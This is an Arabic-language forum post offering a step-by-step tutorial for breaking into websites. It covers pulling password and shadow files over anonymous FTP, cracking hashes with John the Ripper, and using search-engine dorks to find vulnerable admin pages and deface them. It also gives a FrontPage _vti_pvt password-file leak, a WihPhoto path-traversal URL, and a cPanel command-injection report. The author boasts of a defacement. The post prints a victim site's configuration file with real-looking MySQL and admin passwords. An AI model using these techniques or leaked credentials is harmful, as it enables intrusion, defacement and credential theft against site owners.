منتدى احباب العراق

العاب برامج ثيمات برامج الهكر
 
الرئيسيةتوبيكاتاليوميةس .و .جبحـثقائمة الاعضاءالمجموعاتالتسجيلدخول


شاطر | 
 

  اختراق المواقع و المنتديات للمبتدئين والمحترفين

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
غيث دليمي
Admin


عدد المساهمات : 290
تاريخ التسجيل : 16/03/2012

مُساهمةموضوع: اختراق المواقع و المنتديات للمبتدئين والمحترفين   الأربعاء ديسمبر 12, 2012 10:17 pm

بسم الله """"

اولا يا شباب يعنى ايه ثغره وكيف تتطبقها وطيف تعرف ان الموقع يدعم بثغره

اسئله تدور فى ذهننا فلكى تعرف فتابع هاد الشرح مع التطيبق

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!

" الثغرات "

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password

وهما يكونان محفوظين في ملف يسمي

PASSWDغالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

kahane.org أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

pass [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسوورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp - ws_ftp

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

الاختراق من الإف تي بي أصبحت طريقة قديمة لذا لن تجد موقعا حديثايضع ملف الباسوورد في إف تي بي ذكرنها فقط كمقدمة..إذا أردت تجريبها جربها على هذا الموقع

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

ولزيادة معلوماتك عن الاختراق بالف تي بي قم بتحميل الملف الموجود بنهاية الصفحة

وبعدها؟؟المشوار مازال طويلا...كلمة السر ستكون مشفرة وسنشرح كيقية كسرها في النهاية....


--------------------------------------------------------------------------------

Exploit = اسثمار = ثغرة

الجزء المهم:

الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغلالها للحصول على ملف الباسوورد وقاعدة البيانات وووو..إلخ

أولا يجب أن تجمع كل المعلومات الممكنة حول الموقع :

1- المنافذ المفتوحة مثل الإف تي بي والتلنت مثلا وهذ عن طريق برامج مثل

super scan

ابحث عنه في الانترنت.

2- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لآخر.

لمعرفة نظام التشغيل إذهب إلى الموقع

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كلآيبي ونظام التشغيل...إلخ

3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك

4- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي

أنواع الثغرات

أبسط الأنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

والأنواع الباقية أو الاستثمارات :

ثغرات مكتوبة بلغة بيرل *.pl

ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج

Active Perl

ثغرات بلغة سي

*.c يمكن استخدامها في لينوكس فقط

ثغرات بلغة شل

*.shويمكن استثمارها في لينوكس فقط

ويمكنك إيجاد الكثير من الأنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.

ويمكنك من خلال البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك بحث أو حتى عداد زوار

حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed أو مشفرة encryption.

مثال لملف باسوورد

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp

ولأن ملف الباسوورد يحتوي على كلمات سر الأشخاص المرخص لهم بدخول الموقع قد لا بزيد عن عشرة أسطر وقد يصل آلاف الأسطر...

كلمات السر السابقة مضللة وهي علامة xوقد تختلف..

أما المشفرة والتي سنحصل عليها تكون هكذا:

مضللة root:x:0:1:Super-User:/:/sbin/sh

مشفرة root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh

root = أو الجذر اسم المستخدم

x = كلمةالسر ولكنها مضللة

وباقي السطر غير مهم

في الأغلب ستكون كلمة السر مضللة shadowed لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر مشفرة يسمى ملف الشادو

shadow file

ويوجد في أماكن معينة تختلف باختلاف نظام التشغيل

token = الرمز الذي يعبر عن الباسوورد


Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *

مثال لملف شادو

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::

نجد أن كلمة السر هي

EpGw4GekZ1B9U

كيف تفك التشفير؟

عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات

John the ripper

وهو يقوم بتجريب كل المحاولات الممكنة حتى يحصل على الباسوورد .

ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثلا وعليك وضع الكلمة المشفرة بدلا من الx وعليك ترتيبها بحيث يكون كل حساب في سطر

طريقة تشغيله:

إذهب إلى الدوس واكتب

john passwd

حيث passwd هو الملف الذي به الباسوورد المشفرة وضعتها

سيظهر :

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE

وإذا أردت معرفة الباسوورد التي يخمنها الآن اضغط انتر

والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه

john.pot

وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه

وفى النهايه ارجو الاستفاده من هاد الموضوع


جميع الحقوق محفوظه لدى

الوطواط الاحمر


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

الدرس الثانى ><><><

][®][^][®][][®][^][®][
وهوا ثغرات المواقع ونبداء من اول ثغراته ونبدء باولال الثغرات

~!~ ثغرة سباق المواقع ~!~

=====================

أولا إذهب إلى أي محرك بحث .. مثلا GOOGLE

وإكتبtop_list/list.php3

رح تلقى الكثير من المواقع ورح يكون اخر الموقع كدا

top_list/list.php3

مثلا هذا الموقع

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

وكذا يكون دخلنا صفحة سباق المواقع


قم بمسح هذا "list.php3" وبدله بـ

admin/updates_admin.php3

سيصبح عنوان الموقع هكذا

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

إدخل على هذا العنوان

ومن ثم سيظهر لك مربع

قم بالذهاب الى الفرونت بيج واكتب الي تبيه مثلا

HACKED BY ALNOR3S

وثم اذهب من الفرونت بيج الى خانة HTML

وانسخ مابداخله بالكامل وضعه في المربع الي في هذا العنوان



[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

بعد كذا اضغط رفع ليرفع الكلام الي الصفحة

ادخل الى الموقع [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]


وشوف توقيعك الي سويته في الفرونت بيج

==================
عيب هذه الثغرة ان اي واحد يعرف الثغرة يقدر يخترق بعدك ...

وهذا الموقع تم اختراقه من قبلى

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

ثغرة الفرنت بيج





السلام عليكم شباب , الفرونت بيج يعتبر من اهم البرامج في انشاء المواقع , ولكن يوجد به ثغرة قويه تمكنك من اختراق موقع الضحيه وامتلاكه

وسوف اقوم بعرض هذهي الثغره بشكل مبسط


نبدا :


اول شي لازم تعرف اذا الموقع يدعم الفرونت بيج وله لا
روح على هذا الموقع [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط] واكتب اسم الموقع وستجد معلومات عن الموقع , ومن بينها اذا كان يدعم الفرونت بيج وله لا .

شرح الثغرة :

الفرونت بيج عند تنصيبه يقوم باقامة فولدرات وهي :

/_private

/_vti_bin

/_vti_cnf

/_vti_log

/_vti_pvt (اخطرهم )

/_vti_txt


ولتطبيق الثغره , اكتب اسم الموقع في المتصفح وبعدين اكتب وراه الثغره
مثال : /http://xxxx.com/_vti_pvt

او يمكنك استخدام برامج البحث عن ثغرات المواقع , و الي من اهمها برنامج عمران omran scan

اوكيه بعد هذي الخطوه بتدخل على الفولدر الي كتبناه (_vit_pvt_/)

وداخله بتحصل ملف مهم جدا باسم service.pw

هذا الملف يحتوي على باسورد صاحب الموقع ولكنه مشفر بمقياس des

ولفك الشفره بنستخدم برنامج john de ripe

حمل الملف السابق service.pw على جهازك وافتح الملف بواسطة برنامج john de ripe , الي يعتمد على تحويل الملف من encypretd الى plan text
يعنى تحويل الكلمه المشفره الى كلمه عاديه .

وبعد ما تفك الشفره خلاص صار الباسورد في ايدك وتستطيع التحكم بالموقع عن طريق الفرونت بيج او رفعه ببرامج ال ftp .

اتمنى انكم استفدتو , وانكم ما تستخدمون الطريقة في اذيت اخوانكم المسلمين .

وهذا برنامج john de riper
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغرات المنتديات

!!!!
sniper-x

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


يتــــــــــــــــــــــــــــــــبع ][®][^][®][][®][^][®][


















ثغرة عبارة عن ثغرة php


هذه الثغرة عبارة عن ثغرة php

هذه الثغرة تعتمد على نظام الاختراق العشوائي
بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل
نضع في خانة البحث
"powered by wihphoto"

طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

نقوم بحذف من الموقع admin.php
ونضيف إليه الجمله التالية
sendphoto.php?album=..&pic=config.inc.php

فبالتالي يصبح العنوان لدينا كالتالي

[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]


ادخل تحت جمله
Sende config.inc.php an

اميلك بالكامل واضغط على زر الارسال
سوف تصلك رسالة فورية بعد ثواني

سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php

عندما تقوم بفتح هذا الملف سوف تجد التالي

FREE FOR NON-COMMERCIAL USE <-- */
/ *************************
*************************
*************************
**/


// WihPhoto Versionsnummer
// =======================
$version = "0.86-dev";

$language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch
// siehe $language Verzeichnis

// http - Adresse:
// ===============
// Bei 0.86-dev noch ohne Bedeutung!
$wihphoto_http = "http://";


// Verzeichnisse:
// ==============
$wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$pix_base = "albums"; // ... die Orginalphotos Pfad relativ
$dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ
$lang_dir = "languages"; // ... language packs Pfad relativ


// WihPhoto - Darstellungsoptionen
// =========================
======
$items_per_page = 20; // maximale Anzahl Photos/Seite
$display_cols = 4; // Spalten pro Seite
$default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums
$thumb_size = 120; // Breite der generierten Thumpnails

// Breite der Bilder welche generiert werden
// =========================
================
$viewsizes = array(400,512,640,800,"Original");

// Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome
// zur Navigationsleiste hinzugefügt werden
// =========================
=========================
=========================
========
$sitehome = "http://spikies-chinchilla-news.de/basefr.htm";


// Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, ....
// 0 = einfache Auflistung der Alben
// =========================
=========================
====================
$startsite = 1;

// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort


// Passwort zum hinzufügen von Bildinformationstext
// =========================
=======================
$adminpass= "galleriemaster";

// Wird PHP im SAFE MODE betrieben?
// =========================
=======
$safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE

// E-Mail Einstellungen für die "SendPhoto" Funktion
// =========================
========================
$subject = "Spikies-Photogallerie"; // E-Mail Subject
$replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse


// -----------------------------------------------------------------------
// ab hier keine ؤnderungen notwendig!
// -----------------------------------------------------------------------

// MySQL - Tabellennamen
// =====================

$wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...)
$wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos


// Zur Grafikenerzeugung:
// "gd" ... GD (http://www.boutell.com/gd)
// "im" ... ImageMagick (http://www.imagemagick.org/)
// =========================
=
$ImageTool = "gd";

// Falls als $ImageTool "im" also ImageMagick gewنhlt wurde
// muss der Pfad zur "convert" Funktion angegeben werden!
$convert = "/usr/bin/convert";

// EXIF Support
// (funkt noch nicht!)
// ===================
$show_exif = 0;

// Rand bei Thumpnails
// ===================
$thumb_border = 1;

// Sprachfiles laden:
require ("$wihphoto_dir/$lang_dir/$language");
?>

*************************
*************************
*************************
******
ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع

// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort


// Passwort zum hinzufügen von Bildinformationstext
// =========================
=======================
$adminpass= "galleriemaster";


حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات :8: :8:


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt

المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع
يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel
اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو
الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري

الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي
ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة )

نأتي الآن للنسخ المصابة وهي :
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1

والثغرة تطبق على النحو التاالي :
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

حيث ان example.com هو عنوان الموقع
اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم

طريقة اكتشاف الثغرة :
وصلت رسالة الى موقع [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
من Arab ViruZ أحد أعضاء Saudi Devilz Team

والرسالة على النحو التالي (ترجمتها) :-
العنوان : Cpanel 8 تحتوي على مشكلة ؟؟
البريد : Arab VieruZ <arabviersus hotmail com>

مرحبا جميعا

عندما جربت ارجع الباسورد تبعي

جربت هذه الوصلة :
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]

لكنني حصلت على هذا :
*/

sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found"


Password Reset
Resetting password for |">ls"|: A confirmation email has been sent to the email address
on file.

*/

انظر الى هذه
sh: line 1: >ls: command not found

هل هذه مشكلة

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



!!!!
sniper-x
---------------------------------------------------
الحل
---------------------------------------------------


للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://demone-iq.almountadaalarabi.com
 
اختراق المواقع و المنتديات للمبتدئين والمحترفين
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى احباب العراق :: منتدى تعليمي-
انتقل الى: